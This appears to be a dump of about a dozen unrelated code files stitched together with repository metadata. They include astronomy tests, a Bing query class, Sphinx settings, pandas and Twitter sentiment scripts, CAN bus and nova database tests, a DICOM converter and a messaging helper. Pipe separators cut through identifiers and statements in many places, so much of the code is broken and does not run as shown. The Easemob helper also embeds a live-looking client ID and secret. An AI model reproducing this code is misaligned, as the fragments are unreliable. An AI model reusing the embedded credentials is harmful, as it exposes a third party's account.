[1, 1, 1] * u.Jy / u.beam)
@pytest.mark.skipif(not CASA_INSTALLED, reason='CASA tests must be run in a CASA environment.')
@pytest.mark.parametrize('filename', ('data_adv', 'data_advs', ' | data_sdav',
'data_vad', 'data_vsad'),
indirect=['filename'])
def test_casa_read(filename, tmp_path):
# Check that SpectralCube.read returns data with the same shape and values
# if read from CASA as if read from FITS.
cube = SpectralCube.read(filename)
make_casa_testimage(filename, tmp_path / 'casa.image')
casacube = SpectralCube.read(tmp_path / 'casa.image')
assert casacube.shape == cube.shape
assert_allclose(casacube.unmasked_data[:].value,
cube.unmasked_data[:].value)
@pytest.mark.skipif(not CASA_INSTALLED, reason='CASA tests must be run in a CASA environment.')
@pytest.mark.parametrize('filename', ('data_adv', 'data_advs', 'data_sdav',
'data_vad', 'data_vsad'),
indirect=['filename'])
def test_casa_read_nomask(filename, tmp_path):
# As for test_casa_read, but we remove the mask to make sure
# that we can still read in the cubes
cube = SpectralCube.read(filename)
make_casa_testimage(filename, tmp_path / 'casa.image')
shutil.rmtree(tmp_path / 'casa.image' / 'mask0')
casacube = SpectralCube.read(tmp_path / 'casa.image')
assert casacube.shape == cube.shape
assert_allclose(casacube.unmasked_data[:].value,
cube.unmasked_data[:].value)
@pytest.mark.skipif(not CASA_INSTALLED, reason='CASA tests must be run in a CASA environment.')
def test_casa_read_stokes(data_advs, tmp_path):
# Check that StokesSpectralCube.read returns data with the same shape and values
# if read from CASA as if read from FITS.
cube = StokesSpectralCube.read(data_advs)
make_casa_testimage(data_advs, tmp_path / 'casa.image')
casacube = StokesSpectralCube.read(tmp_path / 'casa.image')
assert casacube.I.shape == cube.I.shape
assert_allclose(casacube.I.unmasked_data[:].value,
cube.I.unmasked_data[:].value)
@pytest.mark.skipif(not CASA_INSTALLED, reason='CASA tests must be run in a CASA environment.')
def test_casa_mask(data_adv, tmp_path):
# This tests the make_casa_mask function which can be used to create a mask
# file in an existing image.
cube = SpectralCube.read(data_adv)
mask_array = np.array([[True, False], [False, False], [True, True]])
bool_mask = BooleanArrayMask(mask=mask_array, wcs=cube._wcs,
shape=cube.shape)
cube = cube.with_mask(bool_mask)
make_casa_mask(cube, str(tmp_path / 'casa.mask'), add_stokes=False,
append_to_image=False, overwrite=True)
ia = casatools.image()
ia.open(str(tmp_path / 'casa.mask'))
casa_mask = ia.getchunk()
coords = ia.coordsys()
ia.unlock()
ia.close()
ia.done()
# Test masks
# Mask array is broadcasted to the cube shape. Mimic this, switch to ints,
# and transpose to match CASA image.
compare_mask = np.tile(mask_array, (4, 1, 1)).astype('int16').T
assert np.all(compare_mask == casa_mask)
# Test WCS info
# Convert back to an astropy wcs object so transforms are dealt with.
casa_wcs = coordsys_to_astropy_wcs(coords.torecord())
header = casa_wcs.to_header() # Invokes transform
# Compare some basic properties EXCLUDING the spectral axis
assert_allclose(cube.wcs.wcs.crval[:2], casa_wcs.wcs.crval[:2])
assert_allclose(cube.wcs.wcs.cdelt[:2], casa_wcs.wcs.cdelt[:2])
assert np.all(list(cu |
forweipan/fimap | src/pybing/query/web.py | Python | gpl-2.0 | 514 | 0.005837 | # This file is part of PyBing (http://pybing.googlecode.com).
#
# Copyright (C) 2009 JJ Geewax http://geewax.org/
# All rights reserved.
#
# This software is licensed as described in the file COPYING.txt,
# which you should have received as pa | rt of this distribution.
"""
This module holds the Bing WebQuery class used to do web searches against Bing.
"""
| from pybing import constants
from pybing.query import BingQuery, Pagable
class WebQuery(BingQuery, Pagable):
SOURCE_TYPE = constants.WEB_SOURCE_TYPE
|
kjjuno/GitComponentVersion | docs/source/conf.py | Python | mit | 4,802 | 0.000416 | # -*- coding: utf-8 -*-
#
# GitComponentVersion documentation build configuration file, created by
# sphinx-quickstart on Tue Apr 11 10:51:23 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
# import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = []
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# | General information about the project.
project = u'GitComponentVersion'
copyright = u'2017, Kevin Johnson'
author = u'Kevin Johnson'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = u'0.0.1'
# The full version, including alpha/beta/rc tags.
release = u'0.0.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for | a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = []
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'sphinx_rtd_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'GitComponentVersiondoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'GitComponentVersion.tex', u'GitComponentVersion Documentation',
u'Kevin Johnson', 'manual'),
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'gitcomponentversion', u'GitComponentVersion Documentation',
[author], 1)
]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'GitComponentVersion', u'GitComponentVersion Documentation',
author, 'GitComponentVersion', 'One line description of project.',
'Miscellaneous'),
]
|
mattmcd/PyAnalysis | mda/tutorial/pandastut.py | Python | apache-2.0 | 1,920 | 0.018229 | #"10 Minutes to pandas" tutorial
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
class ObjectCreator:
"""Object creation demo"""
def __init__(self):
self.data = []
def createSeries(self):
s = pd.Series( [1,3,5,np.nan,6,8] );
return s
def createDataFrame(self):
dates = pd.date_range('20130101', periods=6)
df = pd.DataFrame(np.random.randn(6,4),index=dates,columns=list('ABCD'))
return df
def createDataFrameFromDict(self):
data = {
'A' : 1.,
'B' : pd.Timestamp('20130102'),
'C' : pd.Series(1, index=list(range(4)), dtype='float32'),
'D' : np.array([3] * 4, dtype='int32'),
'E' : pd.Categorical(["test","train","test","train"]),
'F' : 'foo' }
df = pd.DataFrame(data);
return df
class Viewer:
"""Example of DataFrame data viewer methods"""
def __init__(self, df=None):
if df is None:
creator = ObjectCreator()
df = creator.createDataFrame();
self.df = df
def all(self):
"""View all data"""
print "All data: df"
print self.df
def head(self, lineCount=None):
print "Head: df.head({})".format(lineCount)
print self.df.head(lineCount)
def tail(self, lineCount=None):
| print "Tail: df.tail({})".format(lineCount)
print self.df.tail(lineCount)
def getIndex(self, lineCount=None):
print "Data index: df.index"
print self.df.index
def getColumns(self, lineCount=None):
print "Data columns: df.columns"
print self.df.columns
def getValues(self, lineCount=None):
print "Data values: df.values"
print self.df.values
def describe(self, lineCount=None):
pr | int "Describe data: df.describe()"
print self.df.describe()
|
vprusso/youtube_tutorials | twitter_python/part_5_sentiment_analysis_tweet_data/sentiment_anaylsis_twitter_data.py | Python | gpl-3.0 | 4,622 | 0.004976 | from tweepy import API
from tweepy import Cursor
from tweepy.streaming import StreamListener
from tweepy import OAuthHandler
from tweepy import Stream
from textblob import TextBlob
import twitter_credentials
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import re
# # # # TWITTER CLIENT # # # #
class TwitterClient():
def __init__(self, twitter_user=None):
self.auth = TwitterAuthenticator().authenticate_twitter_app()
self.twitter_client = API(self.auth)
self.twitter_user = twitter_user
def get_twitter_client_api(self):
return self.twitter_client
def get_user_timeline_tweets(self, num_tweets):
tweets = []
for tweet in Cursor(self.twitter_client.user_timeline, id=self.twitter_user).items(num_tweets):
tweets.append(tweet)
return tweets
def get_friend_list(self, num_friends):
friend_list = []
for friend in Cursor(self.twitter_client.friends, id=self.twitter_user).items(num_friends):
friend_list.append(friend)
return friend_list
def get_home_timeline_tweets(self, num_tweets):
home_timeline_tweets = []
for tweet in Cursor(self.twitter_client.home_timeline, id=self.twitter_user).items(num_tweets):
home_timeline_tweets.append(tweet)
return home_timeline_tweets
# # # # TWITTER AUTHENTICATER # # # #
class TwitterAuthenticator():
def authenticate_twitter_app(self):
auth = OAuthHandler(twitter_credentials.CONSUMER_KEY, twitter_credentials.CONSUMER_SECRET)
auth.set_access_token(twitter_cred | entials.ACCESS_TOKEN, twitter_credentials.ACCESS_TOKEN_SECRET)
return auth
# # # # TWITTER STREAMER # # # #
class TwitterStreamer():
"""
Class for streaming and | processing live tweets.
"""
def __init__(self):
self.twitter_autenticator = TwitterAuthenticator()
def stream_tweets(self, fetched_tweets_filename, hash_tag_list):
# This handles Twitter authetification and the connection to Twitter Streaming API
listener = TwitterListener(fetched_tweets_filename)
auth = self.twitter_autenticator.authenticate_twitter_app()
stream = Stream(auth, listener)
# This line filter Twitter Streams to capture data by the keywords:
stream.filter(track=hash_tag_list)
# # # # TWITTER STREAM LISTENER # # # #
class TwitterListener(StreamListener):
"""
This is a basic listener that just prints received tweets to stdout.
"""
def __init__(self, fetched_tweets_filename):
self.fetched_tweets_filename = fetched_tweets_filename
def on_data(self, data):
try:
print(data)
with open(self.fetched_tweets_filename, 'a') as tf:
tf.write(data)
return True
except BaseException as e:
print("Error on_data %s" % str(e))
return True
def on_error(self, status):
if status == 420:
# Returning False on_data method in case rate limit occurs.
return False
print(status)
class TweetAnalyzer():
"""
Functionality for analyzing and categorizing content from tweets.
"""
def clean_tweet(self, tweet):
return ' '.join(re.sub("(@[A-Za-z0-9]+)|([^0-9A-Za-z \t])|(\w+:\/\/\S+)", " ", tweet).split())
def analyze_sentiment(self, tweet):
analysis = TextBlob(self.clean_tweet(tweet))
if analysis.sentiment.polarity > 0:
return 1
elif analysis.sentiment.polarity == 0:
return 0
else:
return -1
def tweets_to_data_frame(self, tweets):
df = pd.DataFrame(data=[tweet.text for tweet in tweets], columns=['tweets'])
df['id'] = np.array([tweet.id for tweet in tweets])
df['len'] = np.array([len(tweet.text) for tweet in tweets])
df['date'] = np.array([tweet.created_at for tweet in tweets])
df['source'] = np.array([tweet.source for tweet in tweets])
df['likes'] = np.array([tweet.favorite_count for tweet in tweets])
df['retweets'] = np.array([tweet.retweet_count for tweet in tweets])
return df
if __name__ == '__main__':
twitter_client = TwitterClient()
tweet_analyzer = TweetAnalyzer()
api = twitter_client.get_twitter_client_api()
tweets = api.user_timeline(screen_name="realDonaldTrump", count=200)
df = tweet_analyzer.tweets_to_data_frame(tweets)
df['sentiment'] = np.array([tweet_analyzer.analyze_sentiment(tweet) for tweet in df['tweets']])
print(df.head(10))
|
shanqing-cai/MRI_analysis | convert_dcm.py | Python | bsd-3-clause | 3,563 | 0.006736 | #!/usr/bin/env python
import os
import sys
import glob
import argparse
from scai_utils import *
help_doc = "Convert raw DICOM images to nii format. (scai)"
# === Heuristics === #
heur = [["functionalsparse", "bold"],
["DIFFUSIONHIGHRES10Min", "diffusion"],
["AAHeadScout32", "aascout"],
["tflmghmultiecho1mmiso", "T1"],
["localizer", "localizer"],
["restingstate", "resting"],
["t2spc", "t2spc"]]
if __name__ == "__main__":
ap = argparse.ArgumentParser(description=help_doc)
ap.add_argument("inputDir", type=str, \
help="Input raw DICOM data directory")
ap.add_argument("outputDir", type=str, \
help="Output directory (for saving the .nii.gz files)")
ap.add_argument("sID", type=str, \
help="Subject ID (e.g., ANS_M01)")
if len(sys.argv) == 1:
ap.print_help()
sys.exit(0)
args = ap.parse_args()
check_dir(args.inputDir)
check_dir(args.outputDir, bCreate=True)
# Create temporary directory #
tmpDir = os.path.join(args.outputDir, "tmp_convert_dcm")
check_dir(args.outputDir, bCreate=True)
delete_file_if_exists(tmpDir, recursive=True)
check_dir(tmpDir, bCreate=True)
dcm2nii_cmd = "dcm2nii -a n -o %s %s" \
% (os.path.abspath(tmpDir), \
os.path.join(os.path.abspath(args.inputDir), "*"))
saydo(dcm2nii_cmd)
# Apply heuristics to move and rename files #
niis = glob.glob(os.path.join(tmpDir, "*.nii.gz"))
niis.sort()
bvec_bval_done = False
for (i0, nii) in enumerate(niis):
[nfp, nfn] = os.path.split(nii)
imgStr = ""
imgType = ""
for (i1, t_item) in enumerate(heur):
if (t_item[0] in nfn):
imgStr = t_item[0]
imgType = t_item[1]
break
if imgType == "":
raise Exception, \
"Unrecognized image type for image file name %s" % nii
# == Parse file name = | = #
assert(nfn.endswith(".nii.gz"))
assert(nfn.count("_") == 1)
ius = nfn.index("_")
assert(ius >= 8)
timeStr = nfn[ius - 8 : ius + 7]
assert(nfn.count(timeStr) == 1)
prefix = nfn[:ius - 8]
nfn1 = nfn.replace(timeStr, "")
| nfn2 = nfn1[len(prefix) :]
suffix = nfn2.replace(imgStr, "").replace(".nii.gz", "")
subDir = os.path.join(args.outputDir, imgType)
check_dir(subDir, bCreate=True)
if prefix == "":
imgFN = os.path.join(subDir, \
"%s_%s_%s.nii.gz" \
% (args.sID, imgType, suffix))
else:
imgFN = os.path.join(subDir, \
"%s_%s_%s_%s.nii.gz" \
% (args.sID, imgType, suffix, prefix))
saydo("cp %s %s" % (nii, imgFN))
check_file(imgFN)
if imgType == "diffusion" and not bvec_bval_done:
bvec = nii.replace(".nii.gz", ".bvec")
bval = nii.replace(".nii.gz", ".bval")
check_file(bvec)
check_file(bval)
bvec_new = imgFN.replace(".nii.gz", ".bvec")
bval_new = imgFN.replace(".nii.gz", ".bval")
saydo("cp %s %s" % (bvec, bvec_new))
saydo("cp %s %s" % (bval, bval_new))
bvec_bval_done = True
# === Remove temporary directory === #
saydo("rm -rf %s" % tmpDir)
|
Akhail/Tebless | tebless/utils/keyboard.py | Python | mit | 550 | 0 | # Copyright (c) 2017 Michel Betancourt
#
# This software is released under the MIT Licens | e.
# https://opensource.org/licenses/MIT
"""Global constants
"""
import sys
import blessed
TERM = blessed.Terminal()
class Key | board(object):
def __getattr__(self, name):
assert isinstance(name, str)
if name.startswith("KEY_") and name in TERM.__dict__:
return TERM.__dict__.get(name)
raise AttributeError(
"type object 'Keyboard' has no attribute '{}'".format(name))
sys.modules[__name__] = Keyboard()
|
hardbyte/python-can | test/test_cantact.py | Python | lgpl-3.0 | 2,119 | 0.000944 | #!/usr/bin/env python
"""
Tests for CANtact interfaces
"""
import unittest
import can
from can.interfaces import cantact
class CantactTest(unittest.TestCase):
def test_bus_creation(self):
bus = can.Bus(channel=0, bustype="cantact", _testing=True)
self.assertIsInstance(bus, cantact.CantactBus)
cantact.MockInterface.set_bitrate.assert_called()
cantact.MockInterface.set_bit_timing.assert_not_called()
cantact.MockInterface.set_enabled.assert_called()
cantact.MockInterface.set_monitor.assert_called()
cantact.MockInterface.start.assert_called()
def test_bus_creation_bittiming(self):
cantact.MockInterface.set_bitrate.reset_mock()
bt = can.BitTiming(tseg1=13, tseg2=2, brp=6, sjw=1)
bus = can.Bus(channel=0, bustype="cantact", bit_timing=bt, _testing=True)
self.assertIsInstance(bus, cantact.CantactBus)
cantact.MockInterface.set_bitrate.assert_not_called()
cantact.MockInterface.set_bit_timing.assert_called()
cantact.MockInterface.set_enabled.assert_called()
cantact.MockInterface.set_monitor.assert_called()
cantact.MockInterface.start.assert_called()
def test_transmit(self):
bus = can.Bus(channel=0, bustype="cantact", _testing=True)
msg = can.Message(
arbitration_id=0xC0FFEF, data=[1, 2, 3, 4, 5, 6, 7, 8], is_extended_id=True
)
bus.send(msg)
cant | act.MockInterface.send.assert_called()
def test_recv(self):
bus = can.Bus(channel=0, bustype="cantact", _testing=True)
frame = bus.recv(timeout=0.5)
cantact.MockInterface.recv.assert_called()
self.assertIsInstance(frame, can.Message)
def test_recv_timeout(self):
| bus = can.Bus(channel=0, bustype="cantact", _testing=True)
frame = bus.recv(timeout=0.0)
cantact.MockInterface.recv.assert_called()
self.assertIsNone(frame)
def test_shutdown(self):
bus = can.Bus(channel=0, bustype="cantact", _testing=True)
bus.shutdown()
cantact.MockInterface.stop.assert_called()
|
berrange/nova | nova/tests/virt/baremetal/db/test_bm_node.py | Python | apache-2.0 | 6,886 | 0.000581 | # Copyright (c) 2012 NTT DOCOMO, INC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Bare-Metal DB testcase for BareMetalNode
"""
from nova import exception
from nova.tests.virt.baremetal.db import base
from nova.tests.virt.baremetal.db import utils
from nova.virt.baremetal import db
class BareMetalNodesTestCase(base.BMDBTestCase):
def _create_nodes(self):
nodes = [
utils.new_bm_node(pm_address='0', service_host="host1",
memory_mb=100000, cpus=100, local_gb=10000),
utils.new_bm_node(pm_address='1', service_host="host2",
instance_uuid='A',
memory_mb=100000, cpus=100, local_gb=10000),
utils.new_bm_node(pm_address='2', service_host="host2",
memory_mb=1000, cpus=1, local_gb=1000),
utils.new_bm_node(pm_address='3', service_host="host2",
memory_mb=1000, cpus=2, local_gb=1000),
utils.new_bm_node(pm_address='4', service_host="host2",
memory_mb=2000, cpus=1, local_gb=1000),
utils.new_bm_node(pm_address='5', service_host="host2",
memory_mb=2000, cpus=2, local_gb=1000),
]
self.ids = []
for n in nodes:
ref = db.bm_node_create(self.context, n)
self.ids.append(ref['id'])
def test_get_all(self):
r = db.bm_node_get_all(self.context)
self.assertEqual(r, [])
self._create_nodes()
r = db.bm_node_get_all(self.context)
self.assertEqual(len(r), 6)
def test_get(self):
self._create_nodes()
r = db.bm_node_get(self.context, self.ids[0])
self.assertEqual(r['pm_address'], '0')
r = db.bm_node_get(self.context, self.ids[1])
self.assertEqual(r['pm_address'], '1')
self.assertRaises(
exception.NodeNotFound,
db.bm_node_get,
self.context, -1)
def test_get_by_service_host(self):
self._create_nodes()
r = db.bm_node_get_all(self.context, service_host=None)
self.assertEqual(len(r), 6)
r = db.bm_node_get_all(self.context, service_host="host1")
| self.assertEqual(len(r), 1)
self.assertEqual(r[0]['pm_address'], '0')
r = db.bm_node_get_all(self.conte | xt, service_host="host2")
self.assertEqual(len(r), 5)
pmaddrs = [x['pm_address'] for x in r]
self.assertIn('1', pmaddrs)
self.assertIn('2', pmaddrs)
self.assertIn('3', pmaddrs)
self.assertIn('4', pmaddrs)
self.assertIn('5', pmaddrs)
r = db.bm_node_get_all(self.context, service_host="host3")
self.assertEqual(r, [])
def test_get_associated(self):
self._create_nodes()
r = db.bm_node_get_associated(self.context, service_host=None)
self.assertEqual(len(r), 1)
self.assertEqual(r[0]['pm_address'], '1')
r = db.bm_node_get_unassociated(self.context, service_host=None)
self.assertEqual(len(r), 5)
pmaddrs = [x['pm_address'] for x in r]
self.assertIn('0', pmaddrs)
self.assertIn('2', pmaddrs)
self.assertIn('3', pmaddrs)
self.assertIn('4', pmaddrs)
self.assertIn('5', pmaddrs)
def test_destroy(self):
self._create_nodes()
db.bm_node_destroy(self.context, self.ids[0])
self.assertRaises(
exception.NodeNotFound,
db.bm_node_get,
self.context, self.ids[0])
r = db.bm_node_get_all(self.context)
self.assertEqual(len(r), 5)
def test_destroy_with_interfaces(self):
self._create_nodes()
if_a_id = db.bm_interface_create(self.context, self.ids[0],
'aa:aa:aa:aa:aa:aa', None, None)
if_b_id = db.bm_interface_create(self.context, self.ids[0],
'bb:bb:bb:bb:bb:bb', None, None)
if_x_id = db.bm_interface_create(self.context, self.ids[1],
'11:22:33:44:55:66', None, None)
db.bm_node_destroy(self.context, self.ids[0])
self.assertRaises(
exception.NovaException,
db.bm_interface_get,
self.context, if_a_id)
self.assertRaises(
exception.NovaException,
db.bm_interface_get,
self.context, if_b_id)
# Another node's interface is not affected
if_x = db.bm_interface_get(self.context, if_x_id)
self.assertEqual(self.ids[1], if_x['bm_node_id'])
self.assertRaises(
exception.NodeNotFound,
db.bm_node_get,
self.context, self.ids[0])
r = db.bm_node_get_all(self.context)
self.assertEqual(len(r), 5)
def test_find_free(self):
self._create_nodes()
fn = db.bm_node_find_free(self.context, 'host2')
self.assertEqual(fn['pm_address'], '2')
fn = db.bm_node_find_free(self.context, 'host2',
memory_mb=500, cpus=2, local_gb=100)
self.assertEqual(fn['pm_address'], '3')
fn = db.bm_node_find_free(self.context, 'host2',
memory_mb=1001, cpus=1, local_gb=1000)
self.assertEqual(fn['pm_address'], '4')
fn = db.bm_node_find_free(self.context, 'host2',
memory_mb=2000, cpus=1, local_gb=1000)
self.assertEqual(fn['pm_address'], '4')
fn = db.bm_node_find_free(self.context, 'host2',
memory_mb=2000, cpus=2, local_gb=1000)
self.assertEqual(fn['pm_address'], '5')
# check memory_mb
fn = db.bm_node_find_free(self.context, 'host2',
memory_mb=2001, cpus=2, local_gb=1000)
self.assertIsNone(fn)
# check cpus
fn = db.bm_node_find_free(self.context, 'host2',
memory_mb=2000, cpus=3, local_gb=1000)
self.assertIsNone(fn)
# check local_gb
fn = db.bm_node_find_free(self.context, 'host2',
memory_mb=2000, cpus=2, local_gb=1001)
self.assertIsNone(fn)
|
wyxpku/pkucourier | user/easemobSendMessage.py | Python | mit | 1,201 | 0.004996 | # -*- coding: UTF-8 -*-
from urllib import request
import json
def send_message(user, message):
# get token, do not change
url_gettoken = "https://a1.easemob.com/ziyuanliu/pkucarrier/token"
header = {"Content-Type":"application/json"}
body = '{"grant_type": "client_credentials","client_id": "YXA6OlYUgJjEEeWXOb1RowOi2A","client_secret": "YXA6Nsfj21Zw60aTAwDd8PWvCnn5obI"}'
body = body.encode()
req = request.Request(url_gettoken, body, header)
resp = request.urlopen(req)
html = resp.read().decode()
| s = json.loads(html)
token = s['access_token']
# send message
url = "https://a1.easemob.com/ziyuanliu/pkucarrier/messages"
# need to change:
# message: params[msg][msg] field
# target user: params[target], must be a dict
params = '{"target_type" : "users", "target" : ["%s"], "msg" : {"type" : "txt", "msg" : "%s"}}' % (user, mes | sage)
header = {"Content-Type":"application/json", "Authorization":"Bearer %s" % (token)}
params = params.encode()
req = request.Request(url, params, header)
resp = request.urlopen(req)
html = resp.read().decode()
return html
# print(html)
return html
# print(html)
|
twbarber/pygooglevoice | googlevoice/voice.py | Python | bsd-3-clause | 11,310 | 0.002122 | from conf import config
from util import *
import settings
import base64
qpat = re.compile(r'\?')
if settings.DEBUG:
import logging
logging.basicConfig()
log = logging.getLogger('PyGoogleVoice')
log.setLevel(logging.DEBUG)
else:
log = None
class Voice(object):
"""
Main voice instance for interacting with the Google Voice service
Handles login/logout and most of the baser HTTP methods
"""
def __init__(self):
install_opener(build_opener(HTTPCookieProcessor(CookieJar())))
for name in settings.FEEDS:
setattr(self, name, self.__get_xml_page(name))
setattr(self, 'message', self.__get_xml_page('message'))
######################
# Some handy methods
######################
def special(self):
"""
Returns special identifier for your session (if logged in)
"""
if hasattr(self, '_special') and getattr(self, '_special'):
return self._special
try:
try:
regex = bytes("('_rnr_se':) '(.+)'", 'utf8')
except TypeError:
regex = bytes("('_rnr_se':) '(.+)'")
except NameError:
regex = r"('_rnr_se':) '(.+)'"
try:
sp = re.search(regex, urlopen(settings.INBOX).read()).group(2)
except AttributeError:
sp = None
self._special = sp
return sp
special = property(special)
def login(self, email=None, passwd=None, smsKey=None):
"""
Login to the service using your Google Voice account
Credentials will be propmpted for if not given as args or in the ``~/.gvoice`` config file
"""
if hasattr(self, '_special') and getattr(self, '_special'):
return self
if email is None:
email = config.email
if email is None:
email = input('Email address: ')
if passwd is None:
passwd = config.password
if passwd is None:
from getpass import getpass
passwd = getpass()
content = self.__do_page('login').read()
# holy hackjob
galx = re.search(r"type=\"hidden\"\s+name=\"GALX\"\s+value=\"(.+)\"", content).group(1)
result = self.__do_page('login', {'Email': email, 'Passwd': passwd, 'GALX': galx})
if result.geturl().startswith(getattr(settings, "SMSAUTH")):
content = self.__smsAuth(smsKey)
try:
smsToken = re.search(r"name=\"smsToken\"\s+value=\"([^\"]+)\"", content).group(1)
galx = re.search(r"name=\"GALX\"\s+value=\"([^\"]+)\"", content).group(1)
content = self.__do_page('login', {'smsToken': smsToken, 'service': "grandcentral", 'GALX': galx})
except AttributeError:
raise LoginError
del smsKey, smsToken, galx
del email, passwd
try:
assert self.special
except (AssertionError, AttributeError):
raise LoginError
return self
def __smsAuth(self, smsKey=None):
if smsKey is None:
smsKey = config.smsKey
if smsKey is None:
from getpass import getpass
smsPin = getpass("SMS PIN: ")
content = self.__do_page('smsauth', {'smsUserPin': smsPin}).read()
else:
smsKey = base64.b32decode(re.sub(r' ', '', smsKey), casefold=True).encode("hex")
content = self.__oathtoolAuth(smsKey)
try_count = 1
while "The code you entered didn't verify." in content and try_count < 5:
sleep_seconds = 10
try_count += 1
print('invalid code, retrying after %s seconds (attempt %s)' % (sleep_seconds, try_count))
import time
time.sleep(sleep_seconds)
content = self.__oathtoolAuth(smsKey)
del smsKey
return content
def __oathtoolAuth(self, smsKey):
import commands
smsPin = commands.getstatusoutput('oathtool --totp ' + smsKey)[1]
content = self.__do_page('smsauth', {'smsUserPin': smsPin}).read()
del smsPin
return content
def logout(self):
"""
Logs out an instance and makes sure it does not still have a session
"""
self.__do_page('logout')
del self._special
assert self.special == None
return self
def call(self, outgoingNumber, forwardingNumber=None, phoneType=None, subscriberNumber=None):
"""
Make a call to an ``outgoingNumber`` from your ``forwardingNumber`` (optional).
If you pass in your ``forwardingNumber``, please also pass in the correct ``phoneType``
"""
if forwardingNumber is None:
forwardingNumber = config.forwardingNumber
if phoneType is None:
phoneType = config.phoneType
self.__validate_special_page('call', {
'outgoingNumber': outgoingNumber,
'forwardingNumber': forwardingNumber,
'subscriberNumber': subscriberNumber or 'undefined',
'phoneType': phoneType,
'remember': '1'
})
__call__ = call
def cancel(self, outgoingNumber=None, forwardingNumber=None):
"""
Cancels a call matching outgoing and forwarding numbers (if given).
Will raise an error if no matching call is being placed
"""
self.__validate_special_page('cancel', {
'outgoingNumber': outgoingNumber or 'undefined',
'forwardingNumber': forwardingNumber or 'undefined',
'cancelType': 'C2C',
})
def phones(self):
"""
Returns a list of ``Phone`` instances attached to your account.
"""
return [Phone(self, data) for data in self.contacts['phones'].values()]
phones = property(phones)
def settings(self):
"""
Dict of current Google Voice settings
"""
return AttrDict(self.contacts['settings'])
settings = property(settings)
def send_sms(self, phoneNumber, text):
"""
Send an SMS message to a given ``phoneNumber`` with the given ``text`` message
"""
self.__validate_special_page('sms', {'phoneNumber': phoneNumber, 'text': text})
def search(self, query):
"""
Search your Google Voice Account history for calls, voicemails, and sms
Returns ``Folder`` instance containting matching messages
"""
return self.__get_xml_page('search', data='?q=%s' % quote(query))()
def archive(self, msg, archive=1):
"""
Arch | ive the specified message by removing it from the Inbox.
"""
if isinstance(msg, Message):
msg = msg.id
assert is_sha1(msg), 'Message id not a SHA1 hash'
self.__messages_post('archive', msg, archive=archive)
def delete(self, msg, trash=1):
"""
Moves th | is message to the Trash. Use ``message.delete(0)`` to move it out of the Trash.
"""
if isinstance(msg, Message):
msg = msg.id
assert is_sha1(msg), 'Message id not a SHA1 hash'
self.__messages_post('delete', msg, trash=trash)
def download(self, msg, adir=None):
"""
Download a voicemail or recorded call MP3 matching the given ``msg``
which can either be a ``Message`` instance, or a SHA1 identifier.
Saves files to ``adir`` (defaults to current directory).
Message hashes can be found in ``self.voicemail().messages`` for example.
Returns location of saved file.
"""
from os import path, getcwd
if isinstance(msg, Message):
msg = msg.id
assert is_sha1(msg), 'Message id not a SHA1 hash'
if adir is None:
adir = getcwd()
try:
response = self.__do_page('download', msg)
except:
raise DownloadError
fn = path.join(adir, '%s.mp3' % msg)
with open(fn, 'wb') as fo:
fo.write(response.read())
return fn
def contacts(self):
"""
Partial data of you |
ufieeehw/IEEE2015 | ros/ieee2015_controller/src/test.py | Python | gpl-2.0 | 436 | 0 | import numpy as np
mecanum_matrix = np.matrix([
[+1, +1, +1, +1], # Unitless! Shooting for ra | d/s
[+1, -1, +1, -1], # Unitles | s! Shooting for rad/s
[+1, +1, -1, -1], # Unitless! Shooting for rad/s
# [+1, -1, -1, +1], # This is the error row (May not be necessary)
